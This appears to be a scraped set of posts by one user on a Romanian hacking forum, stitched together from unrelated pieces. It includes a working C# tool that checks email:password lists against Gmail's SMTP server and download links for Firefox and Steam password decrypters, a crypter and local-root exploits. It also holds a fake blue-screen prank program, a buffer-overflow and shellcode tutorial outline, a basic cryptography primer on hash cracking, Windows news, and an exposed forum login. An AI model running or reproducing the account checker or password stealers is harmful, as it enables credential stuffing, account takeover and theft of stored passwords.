Nytro

Paperback: 288 pages Publisher: Wiley (March 23, 2009) Language: English ISBN-10: 0470478365 ISBN-13: 978-0470478363 Format: PDF Description: Explore a ton of powerful Mac OS X UNIX commands This handy, compact guide teaches you to use Mac OS X UNIX systems as the experts do: from the command line. Try out more than 1,000 commands to find and get software, monitor system health and security, and access network resources. Apply the skills you learn from this book to troubleshoot networks, lock down security, and uncover almost anything you care to know about your Mac OS X system. Expand your Mac OS X UNIX expertise in these and other areas: - Using the shell - Finding online software - Working with files - Playing with music and images - Administering file systems - Backing up data - Checking and managing running processes - Accessing network resources - Handling remote system administration - Locking down security Download: http://www.file2box.com/a9vllqzqbigt

using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Net.Mail; using System.Net; using System.Collections; using System.IO; namespace GMailCheck { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button1_Click(object sender, EventArgs e) { try { if(textBox1.Text == "") MessageBox.Show("list is empty"); ArrayList mails = new ArrayList(textBox1.Text.Split('\n')); //seperate them by new lines for (int i = 0; i < mails.Count; i++) { ArrayList mailInfo = new ArrayList(mails[i].ToString().Split(':')); if (!mailInfo[0].ToString().EndsWith("@gmail.com")) mailInfo[0] = mailInfo[0] + "@gmail.com"; if (checkAccount(mailInfo[0].ToString(), mailInfo[1].ToString())) { textBox2.Text += mailInfo[0].ToString() + ":" + mailInfo[1].ToString() + "\r\n"; } } } catch (Exception ex) { MessageBox.Show(ex.Message); } } static bool checkAccount(string username, string password) { //we use fake emails so nobody recieves the email, if you want a email when //the correct login is found, supply your email address MailMessage msg = new MailMessage(); msg.From = new MailAddress("Wefwqefwef@sdfsddf.com");//fake email msg.To.Add("Asfasdf@ssdfs.com");//fake email msg.Subject = "test"; msg.Body = "test"; SmtpClient smtp = new SmtpClient("smtp.gmail.com"); smtp.Credentials = new NetworkCredential(username, password); smtp.EnableSsl = true; try { smtp.Send(msg); return true; } catch(Exception ex) { return false; } } private void button2_Click(object sender, EventArgs e) { try { openFileDialog1.ShowDialog(); StreamReader read = new StreamReader(openFileDialog1.FileName); while (!read.EndOfStream) { textBox1.Text += read.ReadLine() + "\r\n"; } } catch (Exception ex) { MessageBox.Show(ex.Message); } } } } Credits: sunjester

Cititi si voi asta oameni buni:

"designeri php" - Interesant... Trebuia sa postezi la Gunoi. Dar am mutat eu

Poti, dar vezi sa nu ii strici structura, adica sa nu incepi sa stergi caractere de acolo.

CTRL + T, bifezi Microsoft Internet Controls, Apply, Ok. Iti apare un glob in Toolbox, il dersenezi pe Form, si ca sa intri pe site: WebBrowser1.Navigate "http://www.google.ro/"

Eroarea e de la CSocketMaster, o clasa pentru inlocuirea mswinsck-ului. PS: Cred ca ma reapuc de Digital Keylogger v4.0.

Tier One: Introduction to Visual C++ 2008 Express Edition This introductory video covers the main features of the Visual C++ 2008 Express Edition and walks you through some of the most common tasks you’ll be doing as you create your programs. By the end of this video, you’ll be more familiar with the development environment and able to get started creating your first application. Some of the topics covered in this video are: Setup Creating a Project Project Files and the Development Environment Writing C++ code Debugging Compiling Managing files and Setting Options Where to go from here Duration: 34 minutes, 46 seconds Video: http://msdn.microsoft.com/en-us/beginner/bb964629.aspx

Tier One: Introduction to Visual Basic 2008 Express Edition This introductory video covers the main features of the Visual Basic 2008 Express Edition, and walks you through some of the most common tasks you’ll be doing as you create your programs. By the end of this video, you’ll be more familiar with the development environment and able to get started creating your first application. Some of the topics covered in this video are: Setup Creating a Project The Windows Form Designer Writing Visual Basic code Compiling, Running and Saving your project Errors and Debugging Project Files, Properties and Customization Data Where to go from here Duration: 36 minutes, 26 seconds Video: http://msdn.microsoft.com/ro-ro/beginner/bb964633(en-us).aspx

Nu folosesc nici unul. Daca chiar am nevoie de unul imi fac singur ( modific Royalu ). Dar nu ma ocup cu astfel de prostii.

Hi, this is a guide about the basics of encryption and all that stuff. I am not an expert in this, I don't know much and as I said, this is only a basic introduction to cryptology in general. First, we need to define what's cryptology and what cryptography. Cryptology is the study of cryptography. Cryptography is the process/skill of encrypting /decrypting ciphers. They are not the same thing. Easy enough. But it's way more complicated than it sounds. There are over 10k encryption methods, each of them different and unique. Some are obsolete, some are damn hard to crack, some are irreversable. As time passes and the decrypters' brain evolves, day by day encryptions are becoming obsolete. But then again, at the same time, the encrypters' brain evolves as well. Stupid example, I know. I'm sure you've heard of md5 (Message Digest algorithm 5, will explain about it later), some consider it uncrackable, irreversable etc. An algorithm created for encrypting sensitive data, such as passwords in a database. Slowly, more and more weaknesses are found in md5 and it's becoming obsolete, so experts started recommending SHA1. (it's slower, and personally I wouldn't recommend it. But, I'm not an expert, what can I say) Enough about md5, let's get back to cryptography in general. Cipher(Cypher) is an algorithm for performing encryption. Encryption has had a major role in history. Key components of an encryption are plaintext (your word, call it whatever you like) and a key (password) that are put through a reversable process named algorithm. The result is ciphertext, which is usually a string which makes no sense whatsoever. There are two methods of cryptography, transposition and substitution. Transposition is where numbers, letters and characters are the same but with different positions. Substitution is where they're replaced with new ones. There are two main types of cryptography, asymmetric and symmetric (also known as public and private keys). I'll explain about those later. All encryption is about, is security. To know if your encryption system is secure, you need to know the vulnerabilities and holes of the previous encryption systems. Encryption systems can be insecure in several ways. One of them being your algorithm being too simple, or the most common weakness in cryptosystems, limited number of possible keys. An attacker can crack it by trying every possible combination there is. Such an attack is known as brute-force. -=[Attack types]=- 1. Bruteforcing: Probably the simpliest way, where the attacker guesses every possible combination till he gets a plaintext result, assuming that the attacker has the key and sufficient resources. 2. Rainbow Table: I don't know much about this. It's the fastest method to use, but it takes some time to create the table and sort it. Rainbow table attack is something like bruteforcing, but in this case, we trade memory for speed. Would compare it with process forking (uhm, don't judge me). 3. Dictionary Attack: All you need is a wordlist with common passwords. This is why I do not recommend using common words as passwords, it's easy to crack. Basically, every word on the wordlist is encrypted till you get a matching hash. -=[The difference between encrypting, encoding and hashes]=- 1. Encryption: The most common of all. Simple, a plaintext and a key are put through an algorithm to produce a ciphertext. Encryptions are reversable, everyone with the ciphertext, key and algorithm can produce the plaintext. Encrypting a plaintext with a different key will result in a different ciphertext, as well as encrypting different messages will result in different ciphertext. 2. Encoding: Almost the same as encryption, except that the key is missing. A plaintext is put through an algorithm, and you get a ciphertext. It's the least used of all three. The key is the MOST important thing. This is not used for security. An example would be mp3 encoding. Your mp3 player decodes the bits and produces the appropriate sound. 3. Hashes: The most complicated of all. Due to the fact that hashes are of a finite size and there is an infinite number of strings you could input into the algorithm there are an infinite number of strings that could produce the same hash. There is not only one possible result and different plaintexts can and will produce the same result, these are called 'collisions'. Hashes are irreversable, with or without the algorithm, there is no way to reverse it. For example, passwords in vBulletin are encrypted in md5. How does the forum know that it's the true password then? It doesn't. As soon as you enter it, it's encrypted in md5, and the forum reads the md5, not the plaintext. As I said, every plaintext will result in it's own hash. When you enter the password, it compares the md5 hash to the one stored in the database. It doesn't have to be the same password as you're using, as long as the ciphertext matches (read above, collision). -=[Examples]=- All ciphertexts are encryptions, encodings or hashes of the word uNkn0wn. 1. MD5: There's a whole paragraph on MD5 later in this article. 5b65e9d92c14d3ca940c7c57db1c19d0 - uNkn0wn dd0896ca696f7d2d50b94aeb1c896a1f - unkn0wn.(case sensitive) 2. Base64: I don't know how to explain it. Base64 is just an encoding algorithm, not an encryption algorithm, it's main use is to send binaries via email and usenet, it turns crazy ASCII codes that you have in binaries into normal text, so it's in a form that can be transmitted via email. Don't expect it to provide any form of security. dU5rbjB3bg== - uNkn0wn. 3. Binary: Made of 1s and 0s in groups of eight. 01110101 01001110 01101011 01101110 00110000 01110111 01101110 - uNkn0wn. 4. Hex: Letters A-Z and numbers 0-9 together. This is not an encryption. Not going to talk about it. 75 4e 6b 6e 30 77 6e 65 64 - uNkn0wn (this is the web way of hex, the "correct" would be 0x75 0x4e 0x6e etc) 5. ROT13: Rotates 13 letters backwards. haxa0ja - uNkn0wn. 6. DES: Data Encryption Standard. Kinda insecure now a days. 56-bit values based on Data Encryption Algorithm. CRJ4GGqMoYx1w - uNkn0wn. 7. SHA1: Sort of like MD5, just with a 160-bit value. 45E252668E0B735E697B1DC21139EE6A3C9CB391 - uNkn0wn. FD11CE37EDC92D41D990AE666EAC00F1EAE8AD7C - unkn0wn. (case sensitive) 8. WHIRLPOOL: Cryptographic hash function that given a message less than 2256 bits in length, it returns a 512-bit message digest represented as 128-digit hexadecimal numbers. Like SHA and MD5, a single character change in the plaintext will result in a completely different cipher. 202DD91B4F1FE7F42388371F91CEE6180B3A1111ACD1167B296CADF3F016D759 8BD93A6211666EDD577F9CF9F25D473215A7E6D69CA7D53EC1ADCB1BF65E3800 - uNkn0wn (it's long) That would be enough encryptions/encodings/hashes for now. -=[MD5 - Message Digest Algorithm 5]=- The famous MD5, widely used. Most people consider it irreversable, but no encryption method is irreversable. Well, sorta. Once you encrypt something in md5 you can't get it back the same way you encrypted it. Attack types explained above. MD5 hashes are used for encrypting sensitive data, as well as a digital signature. If anything is changed, including case, the whole hash twists. The only known way to crack an MD5, is collision (read bruteforcing and dictionary attacks) where a number of possible passwords are encrypted and compared with the MD5 hash being cracked. A MD5 hash will always be 32 characters in length (128-bit value) and only consists of the characters (charset) a-f and 0-9 (hex). When bruteforcing an MD5 hash, we need to define a charset and possible length which we believe the plaintext would be. But keep in mind that using a wordlist is much faster than bruteforcing since there is a set number of hashes possible. The larger the wordlist is, the higher the chance of cracking the hash is, but it will also take longer. For a more successful attack, you can try capitalizing the words, reversing order, adding chars etc etc. MD5 is becoming easier and easier to crack, which means that a new, more secure method of encryption would be needed. A salt is made up of random bits that are used as inputs to a KDF. Think of it like this, if a user's key is stolen and he is known to have a pass of an english word. Because of the salt, pre-calculated hashes have no value. So this increases the amount of hashes that have to be computed from 200,000 to 800 trillion. Salt should always be applied, no matter the security of the algorithm. Any md5 hash is vulnerable to BF/Rainbow tables unless the hash incorporates a salt, (MySQL MD5 encryption does not use salts which really makes it easy to crack) If someone was to gain access to the database .. Average timetables for BF attacks on MD5 would be something like this Note: the 1,8 means testing all possible passwords 1-8 chars in length.. (if the forum requires say 4 letters min then they would do 4-8 cutting the time in basically half) 8 Chars [a-zA-Z0-9]{1,8} ... about 497 days [a-z0-9]{1,8} ...... about 6 days [a-zA-Z]{1,8} ...... about 6 days [A-Z0-9]{1,8} ...... about 6 days -=[symetric/Asymmetric Keys]=- One of the main components of an encryption is the key. In all cases, we must assume that the attacker has the cryptographic algorithm and the ciphertext. It's just a matter of time before he cracks it. In order to prevent him from getting the plaintext, we use keys. How does this work, well...keys are simply just small pieces of data, metadata even, that will keep the information safe. In other words, this is just a password. Anyone with the key and the algorithm can get the plaintext. There's public and private keys, symetric and asymmetric. I'll explain the difference in short, when our algorithm uses one key for both encryption and decryption, then we got a symetric key. When we have an encryption which uses a different key for encrypting and a different key for decrypting, this is asymmetric. Let's see how it would look in the "real" world. User A encrypts a message using a public key. Message is sent to user B in an encrypted form. User B has the private key, only he can decrypt it. Everyone can encrypt using the public key, only you can decrypt it using the private key. In some cases, you will need to fetch the private key from your targets. This is the part where social engineering comes in handy. Another example would be a mailbox. Everyone can leave a letter, only you can unlock the mailbox and read it. There's plenty of keys used around, one of the most used being RSA which includes both public and private key. Keys should be random nonsense for security. Usually KDF (key derivation function) is used in this case which adds a salt and compresses the key to a fixed length. This is used for digital signatures as well. Conclusion tip: Never use a password which can be found in the dictionary. Thank you. I hope you enjoyed this article, even though I doubt it. It's for educational purposes. Please let me know if you see any grammatical errors. Or, let me know if I missed punctuation somewhere. ~FxM

Codul sursa a fost generat automat de Photoshop ( banuiesc ).

Author: Uranium-239 #include <windows.h> #define SCREEN(x) GetSystemMetrics(*x == 'X' ? SM_CXSCREEN : SM_CYSCREEN) LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM); char szClassName[ ] = "WindowsApp"; const char * BSOD_TEXT[] = { "-A problem has been detected and Windows has been shut down to prevent damage", "-to your computer.", "*The problem seems to have been caused by the following file: SPCMDCON.SYS", "*PAGE_FAULT_IN_NONPAGED_AREA", "*If this is the first time you've seen this Stop error screen,", "-restart your computer. If this screen appears again, follow", "-these steps:", "*Check to make sure any new hardware or software is properly installed.", "*If this is a new installation, ask your hardware or software manufacturer", "-for any Windows updates you may need", "*If problems continue, disable or remove any newly installed hardware", "-or software. Disable BIOS memory options such as caching or shadowing.", "*If you need to use Safe Mode to remove or disable components, restart", "-your computer, press F8 to select Advanced Startup Options, and then", "-select Safe Mode.", "*Technical Information:", "**** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)", "**** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c" }; void PRINT_TEXT(HDC hDC){ unsigned char k = 0; unsigned short y_co = 30; while(k <= 17){ if(BSOD_TEXT[k][0] == '*') y_co += 23; TextOut(hDC,10,y_co+(k*23),BSOD_TEXT[k]+1,lstrlen(BSOD_TEXT[k])-1); k++; } } int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil){ HWND hwnd; MSG messages; WNDCLASSEX wincl; wincl.hInstance = hThisInstance; wincl.lpszClassName = szClassName; wincl.lpfnWndProc = WindowProcedure; wincl.style = CS_DBLCLKS; wincl.cbSize = sizeof (WNDCLASSEX); wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION); wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION); wincl.hCursor = LoadCursor (NULL, IDC_ARROW); wincl.lpszMenuName = NULL; wincl.cbClsExtra = 0; wincl.cbWndExtra = 0; wincl.hbrBackground = CreateSolidBrush(RGB(0,0,0x77)); if (!RegisterClassEx (&wincl)) return 0; ShowCursor(FALSE); hwnd = CreateWindowEx ( 0, szClassName, "BSOD", WS_POPUP, 0, 0, SCREEN("X"), SCREEN("Y"), HWND_DESKTOP, NULL, hThisInstance, NULL ); ShowWindow (hwnd, nFunsterStil); while(GetMessage (&messages, NULL, 0, 0)){ TranslateMessage(&messages); DispatchMessage(&messages); } return messages.wParam; } HDC hDC; PAINTSTRUCT ps; HFONT hFont; LRESULT CALLBACK WindowProcedure(HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam){ switch(message){ case WM_DESTROY: PostQuitMessage(0); break; case WM_PAINT: hDC = BeginPaint(hwnd,&ps); hFont = CreateFont( 26, 16, 0, 0,FW_NORMAL, FALSE, FALSE, FALSE, ANSI_CHARSET,OUT_DEFAULT_PRECIS,CLIP_DEFAULT_PRECIS, DEFAULT_QUALITY,DEFAULT_PITCH|FF_ROMAN,"Courier New" ); SelectObject(hDC, hFont); SetTextColor(hDC,RGB(0xFF,0xFF,0xFF)); SetBkColor(hDC,RGB(0,0,0x77)); PRINT_TEXT(hDC); DeleteObject(hFont); EndPaint(hwnd, &ps); break; default: return DefWindowProc (hwnd, message, wParam, lParam); } return 0; } Screenshot: http://i30.tinypic.com/6qdsmw.jpg

Mozilla Firefox 3.5 Password Decrypter Credits: bl4cksun.org Download: http://www.2shared.com/file/7142545/68574f27/firefox35decrypter.html

Steam® application password decrypter. Credits: bl4cksun.org Download: http://www.2shared.com/file/7142526/a704b91b/steam_password_reader.html

Mai gasiti aici: http://th3-0utl4ws.com/localroot/

Buffer Overflow Basics Video Series! In this video series we will learn the basics of Buffer Overflow attacks and demonstrate how one can exploit Buffer Overflows in programs for fun and profit. The pre-requisite for this video series is that you are familiar with Assembly language. If you are not familiar with Assembly language, no worries, I have created detailed video tutorials for Assembly language here - Assembly Language Primer for Hackers. 1. Smashing the Stack In Part 1 of the Buffer Overflow series we will look at why buffer overflow attacks happen. We will discuss how the program stack is laid out when a function call happens, then how a buffer can be overwritten if proper bounds checking does not happen and finally how a hacker could take control of the program by overwriting the return address stored on the stack to an arbitrary value. Buffer Overflow Primer Part 1 (Smashing the Stack) Tutorial 2. Writing Exit Shellcode In this video we will look at how to create Shellcode which we can use as payload while exploiting a buffer overflow vulnerability. Buffer Overflow Primer Part 2 (Writing Exit Shellcode) Tutorial 3. Executing Shellcode In the last video we saw how to create shellcode from assembly language code, this video will concentrate on how to execute the shellcode from within a C program to check that it is working properly. Buffer Overflow Primer Part 3 (Executing Shellcode) Tutorial 4. Disassembling Execve In this video we will look at how to create shellcode for the Execve() syscall. We will first create a C program to spawn a shell using Execve(), then we will disassemble the program to understand how the syscall works and the kind of inputs it expects. Buffer Overflow Primer Part 4 (Disassembling Execve) Tutorial 5. Shellcode for Execve In this video we will learn how to convert the shellcode created in the previous video to a more usable format. It is important to note that the shellcode in the previous video cannot be used as-is becuase it contains NULLs and hardcoded addresses. Thus we need to convert it into something which can be injected into a buffer - i.e. we need to remove the NULLs and setup relative addressing. This video will show how we can replace the NULLs in the shellcode with instructions which results in non-NULL shellcode. Also, we discuss in detail how we can setup relative addressing within the shellcode and modify it at runtime to make it work. Buffer Overflow Primer Part 5 (Shellcode for Execve) Tutorial 6. Exploiting a Program In this video we will understand how to use the shellcode created in the previous video to exploit an actual program. Buffer Overflow Primer Part 6 (Exploiting a Program) Tutorial 7. Exploiting a Program Demo In this video we will do a buffer overflow exploitation demo using HackYou.c and ExploitMe.c Buffer Overflow Primer Part 7 (Exploiting a Program Demo) Tutorial 8. Return to Libc Theory In this video we will look at how to subvert the NX protection mechanism. The NX protection mechanism basically marks the stack, heap etc. as Non-Executable. This means the processor will not execute any instruction which is on them. From a stack overflow standpoint, this is a problem as our entire shellcode is on the stack, which now has been marked "Non-Executable". The way we counter this problem, is by using a technique called "Return to Libc". Buffer Overflow Primer Part 8 (Return to Libc Theory) Tutorial 9. Return to Libc Demo In this video we will do a hands on demo of exploiting a stack protected by NX using the Return to Libc exploitation process. We use GDB and attach it to the vulnerable program to find the address of "/bin/bash" in it's memory. Once this address is found, we modify Ret2libc.c and launch the attack on the vulnerable program. The successful exploitation leads to spawning of a shell. Buffer Overflow Primer Part 9 (Return to Libc Demo) Tutorial Thanks, Vivek

Windows 8 vine in 2012 de Mina Hutterer | 8 august 2009 Desi Windows 7 va fi lansat abia in octombrie, conform unei imagini aparent "scapate" de sucursala italiana Microsoft, compania a programat deja lansarea lui Windows 8 in 2012. Autenticitatea imaginii nu poate fi verificata, insa o lansare estimata peste trei ani nu este deloc nerealista. In cazul in care imaginea este autentica, aceasta cifra este doar o estimare interna a companiei Microsoft. In plus, 2012 este precedat de ~ in imagine, ceea ce denota o data aproximativa. Pana la Windows 8, Windows 7 va fi lansat in luna octombrie a acestui an si, pana acum, Microsoft a reusit sa starneasca valva in jurul noului sistem de operare, care a fost destul de bine primit, mai ales de catre utilizatorii care au reticente in a renunta la Windows XP.

Windows 7 va avea "grafica" DirectX 11 de Mina Hutterer | 7 august 2009 Prin Windows 7, Microsoft doreste sa ofere un sistem de operare capabil sa foloseasca eficient hardware-ul video din sistem. Compania colaboreaza strans cu NVIDIA si AMD (ATI) pentru a se asigura ca nu va exista niciun fel de problema intre Windows 7 DirectX 11 si driverele placilor cu chipset GeForce si Radeon. Unul dintre avantajele principale ale lui DirectX 11 este, de exemplu, posibilitatea sistemului de operare de a reda material video fara a solicita CPU-ul - direct prin placa grafica. Mai mult decat atat, un reprezentant AMD afirma ca DirectX 11 va permite un nivel de realism in jocuri imposibil pana acum. AMD are planuri sa lanseze primele placi compatibile cu DirectX 11 in octombrie 2009, odata cu lansarea lui Windows 7. Iata caracteristicile principale ale lui DirectX 11: o Full support (including all DX11 hardware features) on Windows Vista as well as future versions of Windows o Compatibility with DirectX 10 and 10.1 hardware, as well as support for new DirectX 11 hardware o New compute shader technology that lays the groundwork for the GPU to be used for more than just 3D graphics, so that developers can take advantage of the graphics card as a parallel processor o Multi-threaded resource handling that will allow games to better take advantage of multi-core machines o Support for tessellation, which blurs the line between super high quality pre-rendered scenes and scenes rendered in real-time, allowing game developers to refine models to be smoother and more attractive when seen up close

Cryptosy Mod By Smokin3000 Download: http://www.2shared.com/file/7135910/43a75220/Cryptosy_Mod_By_Smokin3000.html

'--------------------------------------------------------------------------------------- ' Module : mLockedFiles ' DateTime : 11/08/2009 02:10 ' Author : SqUeEzEr ' Mail : scott_van_dinter@hotmail.com@hotmail.com ' Purpose : Close filehandles owned by other processes ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Reference : Deleting locked files ' http://www.codeguru.com/cpp/w-p/files/fileio/article.php/c1287 ' ' History : 11/08/2009 First Cut.................................................... '--------------------------------------------------------------------------------------- Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long Private Declare Function NtDuplicateObject Lib "NTDLL.DLL" (ByVal hSourceProcess As Long, ByVal hSourceHandle As Long, ByVal hCopyProcess As Long, CopyHandle As Long, ByVal DesiredAccess As Long, ByVal Attributes As Long, ByVal Options As Long) As Long Private Declare Function NtClose Lib "NTDLL.DLL" (ByVal ObjectHandle As Long) As Long Public Declare Function CreateToolhelp32Snapshot Lib "Kernel32.dll" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long Public Declare Function Process32First Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long Public Declare Function Process32Next Lib "Kernel32.dll" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long Public Declare Function CloseHandle Lib "Kernel32.dll" (ByVal hObject As Long) As Long Public Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long Public Declare Function RtlAdjustPrivilege Lib "ntdll" (ByVal Privilege As Long, ByVal Enable As Boolean, ByVal Client As Boolean, WasEnabled As Long) As Long Public Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long ' Identifier of the process th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * 260 End Type Private Const FILE_FLAG_BACKUP_SEMANTICS As Long = &H2000000 Private Const GENERIC_ALL As Long = &H10000000 Private Const FILE_SHARE_READ As Long = &H1& Private Const FILE_SHARE_WRITE As Long = &H2& Private Const OPEN_EXISTING As Long = 3& Private Const DUPLICATE_CLOSE_SOURCE = &H1 Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Public Const TH32CS_SNAPPROCESS As Long = &H2 Public Function Closehandles(sFileName As String) As Boolean Dim hFile As Long Dim pInfo As PROCESSENTRY32 Dim hSnapshot As Long Dim lSuccess As Long Dim lRet As Long Dim hProcess As Long Call RtlAdjustPrivilege(20, True, True, 0) hFile = CreateFile(sFileName, GENERIC_ALL, FILE_SHARE_WRITE And FILE_SHARE_READ, 0&, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, 0&) hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) pInfo.dwSize = Len(pInfo) lSuccess = Process32First(hSnapshot, pInfo) If hSnapshot = -1 Then Debug.Print "Unable to take snapshot of process list!" Else Do While lSuccess <> 0 hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, pInfo.th32ProcessID) Call NtDuplicateObject(hProcess, hFile, 0, ByVal 0, 0, 0, DUPLICATE_CLOSE_SOURCE) Call NtClose(hProcess) pInfo.dwSize = Len(pInfo) lSuccess = Process32Next(hSnapshot, pInfo) Loop lRet = CloseHandle(hSnapshot) End If Closehandles = True End Function Usage: If Closehandles("C:\file.txt") Then Kill "C:\file.txt"

While many ActiveX components are slowly being replaced with technologies considered more secure and/or web-mature, many developers still utililise ActiveX controls as a quick way to push advanced functionality out to web browsers. ActiveX security is based on digital signatures, if you trust the source of the component then it is safe to run the control. That said, when the control is run, it runs like any other Win32 desktop application and has access to the same resources, unlike Java, which executes inside a safe environment known as a “sandbox”, thus limiting what the Applet has access to. Well that’s how the sandbox works in theory at least. In other words, you better trust the authors of the ActiveX component. In this paper, I won’t be focusing on the ActiveX security model, but rather on the identification of vulnerabilities in the ActiveX control itself, not in the way the control interacts with its environment. This is an interesting topic, as the presence of such vulnerabilities could enable malicious individuals to compromise a user’s computer, simply by guiding them to a malicious web site. In other words, no actions, on the part of the user, are required for remote code execution. The paper ( by shape ) can be viewed here: http://blog.sat0ri.com/wp-content/uploads/2009/08/Identifying-Vulnerabilities-in-ActiveX-Controls.pdf

Gata, am inteles cum sta treaba si cred ca am facut si pace.

De curiozitate, care e rtatul care copiaza de pe acest forum?

Da, si raspunsurile imi par cunoscute Copil fara viitor. PS: Care mm scrie cu contul meu? User: Nytro Pass: adminxxx